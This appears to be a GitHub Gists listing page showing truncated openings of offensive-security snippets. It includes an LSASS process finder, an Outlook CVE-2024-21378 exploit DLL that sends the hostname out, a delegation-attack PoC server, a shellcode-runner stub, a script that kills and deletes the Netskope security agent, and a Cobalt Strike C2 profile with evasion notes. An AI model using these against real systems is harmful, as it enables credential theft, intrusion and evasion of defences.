This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _CRT_SECURE_NO_WARNINGS | |
#include <Windows.h> | |
#include <Psapi.h> | |
#include <TlHelp32.h> | |
#include <iostream> | |
DWORD GetLsassPid() { | |
PROCESSENTRY32 entry; | |
entry.dwSize = sizeof(PROCESSENTRY32); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
# this is a *very* rough PoC | |
import SimpleHTTPServer | |
import SocketServer | |
import base64 | |
import random | |
import struct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo 'deb http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sources.list | |
apt-get update | |
apt-get -y install php5 libapache2-mod-php5 php5-mysql php5-curl php5-gd php5-intl php5-imap php5-mcrypt php5-pspell php5-recode php5-tidy php5-xmlrpc php5-xsl | |
a2dismod php7.0 ; sudo a2enmod php5 ; sudo service apache2 restart | |
service mysql start |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace UnmanagedCode | |
{ | |
class Program | |
{ | |
[DllImport("kernel32")] | |
static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
sudo ps aux | grep Netskope | grep -v grep | awk '{ print "kill -9", $2 }' | sudo sh | |
echo '[✓] Kill Netskope Process' | |
sudo rm -rf /Applications/Remove\ Netskope\ Client.app | |
echo '[✓] Removed Remove Netskope Client.app' | |
sudo rm -rf /Library/Application\ Support/Netskope | |
echo '[✓] Removed Agent of Netskope Client.app' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
# as stage0, remote injecting a thread into a suspended process works | |
set host_stage "false"; | |
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
set sleeptime "10000"; | |
stage { | |
set allocator "MapViewOfFile"; | |
set name "notevil.dll"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// memBruteforce.cpp by aaaddress1@chroot.org | |
// brute search loaded moudules in memory | |
// rewrite from https://www.exploit-db.com/exploits/45293 | |
#include <Windows.h> | |
#include <iostream> | |
#pragma warning(disable:4996) | |
bool isMemExist(size_t addr) { | |
int retv; | |
__asm { |
NewerOlder